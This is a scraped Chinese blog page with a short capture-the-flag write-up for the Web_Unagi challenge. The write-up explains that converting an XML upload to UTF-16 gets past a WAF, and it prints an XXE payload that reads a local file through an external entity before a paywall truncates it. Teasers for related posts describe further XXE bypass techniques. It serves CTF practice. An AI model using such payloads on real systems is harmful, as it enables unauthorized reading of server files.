xxe编码绕过(8-19)

最新推荐文章于 2024-05-31 11:48:50 发布
最新推荐文章于 2024-05-31 11:48:50 发布
阅读量1.6k 收藏 1
点赞数
分类专栏: buuctf刷题记录 ctfweb
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Realiy/article/details/108112531
版权

[CSAWQual 2019]Web_Unagi

只能上传xml文件,考虑存在xxe

直接上传显示waf拦截了,转换成utf16编码就能绕过

<!--filename:1.xml-->
<!--author:ta3shi-->
<!DOCTYPE users[
<!ENTITY a SYSTEM "file:///flag">
]>
<users>
<user>
<username>Alice</username>
<password>passwd1</password>
<name>&a;</name>
<email>&a;</email>
<intro>&a;</intro>
<group>&a;</group>
</user>
<user>
<username>bob</username>
<password>passwd2</
最低0.47元/天 解锁文章
ta3shi
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XXE的利用手法及绕过
qq_36334672的博客
01-29 137
当目标运行我们引用外部实体时,可通过构造恶意数据,执行任意文件读取,内网端口探测,攻击内网,甚至命令执行——安装了expect扩展。XXE主要由DTD文档构成,因此先介绍DTD,如下所示红色部分为DTD1、开头必须声明为XML <?2、第二行为例如 <!DOCTYPE NOTE //声明此文档为NOTE类型DOCTYPE ANY //也可以为ANYDOCTYPE ROOT //ROOT之类3、DTD有内外引用两种方式1)内部的 DOCTYPE 声明2)外部文档声明。
BUUCTF:[CSAWQual 2019]Web_Unagi -- xxe 简单的外部实体bypass ,编码绕过
Zero_Adam的博客
04-08 640
二、学的的 这个好像是xxe的那啥,默认技巧吧,,utf8上传说有waf,然后就换成utf16进行上传 最近做的xxe的题,都是简单的每waf的。外部实体注入就好了,,, 注意,如果,system的命令 file:///flag。不好使的时候,还可用 PHP的伪协议来做,php://filer/这些来,到时候多试试就好了 三、 WP 初末 看一下iconv命令吧,总不能一个题什么都没学到东西啊, 语句: iconv -f utf8 -t utf16 test.xml -o aaa.xml 这个语句弄上
[CSAWQual 2019]Web_Unagi
最新发布
2302_79839194的博客
05-31 303
且在About中告诉我们了,flag位于 /flag ==> 使用file协议直接读取本地文件**(这里指的是,我们上传文件给服务器,服务器解析文件,读取的是服务器的本地文件,也就是flag文件)**|:管道符,将前一个的结果(2.xml文件内容),作为下一个命令的输入 ==> 将内容进行编码的转换。发现是xml数据格式,且存在上传文件的功能 => 联想到 XXE注入(引用外部实体)-t:指定输出文件的编码格式是UTF-16BE(大端字节序)-f:指定输入文件(2.xml)是UTF-8编码格式。
XXE的理解与绕过
weixin_50464560的博客
11-30 1548
转载至https://www.freebuf.com/articles/web/291094.html 前置知识XXE如何理解?它是可扩展标记语言 ( XML) 用于存储和传输数据。通常始于异步JavaScript和XML技术(ajax技术):网页应用能够快速地将增量更新呈现在用户界面上,而不需要重载(刷新)整个页面。目前JSON的使用比XML更加普遍。JSON和XML都被用于在Ajax模型中的XML技术。这种标记语言允许开发人员定义和表示任意数据结构的HTML。以下为定义属性和值的Security Ass
【WEB漏洞原理】XML&XXE利用检测绕过
过期的秋刀鱼
09-14 839
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害XXE是XML的一个漏洞XXE产生根本原因:网站接受XML数据,没有对xml进行过滤。
XXE和XML利用和绕过
qq_49078152的博客
07-19 816
XXE和XML
WEB漏洞-XXE&XML之利用检测绕过全解(39)
san3144393495的博客
06-29 1525
除了这个形式,还有一个过滤,我们绕过思路就是采用协议玩法,换一种协议去执行想要的结果,或者采用外部引用,把核心代码写到外部东西上面去,DTD上面去实现绕过,还有一种编码把一些关键词进行编码,达到关键字的绕过,根据具体情况选出不同的方案。判定这个漏洞存在之后,我们该如何去利用,分为两种,第一种是输出形式,利用的结果显示,分为两种情况,一种情况是有回显,一种是回显;xml:xml被设计成传输和储存数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容。
XXE - 防御策略-01
09-15
XXE 防御策略 XXE(Xml External Entity)漏洞是一种常见的 XML 解析漏洞,攻击者可以通过构造恶意 XML 文档来读取敏感信息或执行系统命令。为了防御 XXE 漏洞,需要了解其成因和防御策略。 一、XXE 漏洞消亡原因 ...
WebGoat8-xxe注入漏洞分析
09-15
下面是对 WebGoat8 中的 XXE 注入漏洞的分析。 XXE 注入漏洞的工作原理 XXE 注入漏洞是基于 XML 外部实体的攻击,攻击者可以通过构造特殊的 XML 实体来读取服务器上的敏感信息。XML 外部实体是 XML 1.0 中的一种...
CVE-2019-2888:WebLogic EJBTaglibDescriptor XXE扩展(CVE-2019-2888)
03-09
CVE-2019-2888 WebLogic EJBTaglibDescriptor XXE漏洞 fernflower.jar weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class ╭─root@jas502n /var ╰─# find ./ |grep EJBTaglibDescriptor  :...
第39天:WEB漏洞-XXE&XML之利用检测绕过全解1
08-03
**XML声明**:XML声明告诉解析器文档使用的XML版本和字符编码,例如`<?xml version="1.0"?>`。 **DTD文档类型定义**:DTD用于定义XML文档的结构和规则,可以是内部的也可以是外部的。内部DOCTYPE声明如`<!DOCTYPE ...
Charset_encoding-Burp:利用字符集编码绕过waf的burpsuite插件
05-18
BurpSuite Plugin 通过字符集编码绕过waf的burp插件 因为小伙伴在实战中有这么个需求(利用字符集编码绕过waf),所以我借着他的这个需求也学习了下burp插件的编写。 预览 ASP.NET+IIS 使用说明 其实这种方法很早就出来了,但并不通用,感觉也有IIS+ASP.NET的时候可以试一试。 测试环境:Windows10 Burp版本:1.7.36 Jython版本:Jython-standalone-2.7.0 burp加载Python运行环境(Python) 加载此插件 在burp proxy或repeater等选项卡 中右键开启相关选项 不通用 Nginx+php No Apache+php No IIS+ASP.NET勉强能用 中文无解(比如上传场景)。。。 支持列表如下 Target Post(application/x-www-form-urlenco
CVE-2021-29447:WordPress-身份验证的XXE(CVE-2021-29447)
05-14
WordPress 5.6-5.7-经过身份验证的XXE(CVE-2021-29447)使用步骤1。 运行WordPress $ make up-wp第2步。 运行Attacker Web服务器$ make up-mal第三步生成恶意的WAV文件$ make make-wav第四步。 登录WordPress并将...
WEB漏洞-XXE&XML之利用检测绕过全解
xhscxj的博客
02-07 1578
xml基础概念 XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。 ...
WEB漏洞-XXE&XML之利用检测绕过
m0_65137829的博客
07-24 1417
XXE-"xml external entity injection" 服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入
XXE&XML】利用检测绕过
qq_41889600的博客
12-13 473
小迪安全xxe xml
Oracle PeopleSoft从XXE到system shell
weixin_34309435的博客
09-18 504
本文讲的是Oracle PeopleSoft从XXE到system shell,几个月前,我有机会审核几个Oracle PeopleSoft解决方案,包括PeopleSoft HRMS和PeopleTool。尽管有几个CVE,但网络上并没有太多攻击此软件的方法,除了两年前HITB大会议题”ERPScan“提到的一些漏洞。从PPT中可以看到PeopleSo...
39:WEB漏洞-XXE&XML之利用检测绕过全解
mingyqf的博客
04-17 429
参考博客:https://www.cnblogs.com/zhengna/p/15740341.html 本文为作者本人笔记和复现,侵删 [39:WEB漏洞-XXE&XML之利用检测绕过全解] 思维导图 知识点 XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。 XXE漏洞全称XML External Entity Injection,即XML外部实体注入漏洞,XXE漏洞发
XXE漏洞学习及利用
qq_38352420的博客
06-30 416
XXE漏洞基础学习 当WEB服务使用XML或者JSON中的一种进行传输时,服务器可能会接收开发人员并未预料到的数据格式。如果服务器上的XML解析器的配置不完善,在JSON传输的终端可能会遭受XXE攻击,也就是俗称的XML外部实体攻击。 XXE是一种针对XML终端实施的攻击,黑客想要实施这种攻击,需要在XML的payload包含外部实体声明,且服务器本身允许实体扩展。这样的话,黑客或许能读取WEB服务器的文件系统,通过UNC路径访问远程文件系统,或者通过HTTP/HTTPS连接到任意主机。 所以学习XXE漏.
泛微oa e-cology xxe 漏洞
08-17
泛微OA是一种常见的企业办公自动化系统,而XXE(XML外部实体注入)漏洞是指攻击者通过注入恶意的外部实体来读取或利用系统中的敏感数据。 泛微OA的XXE漏洞是由于系统对外部XML实体的处理不当所导致的。攻击者可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值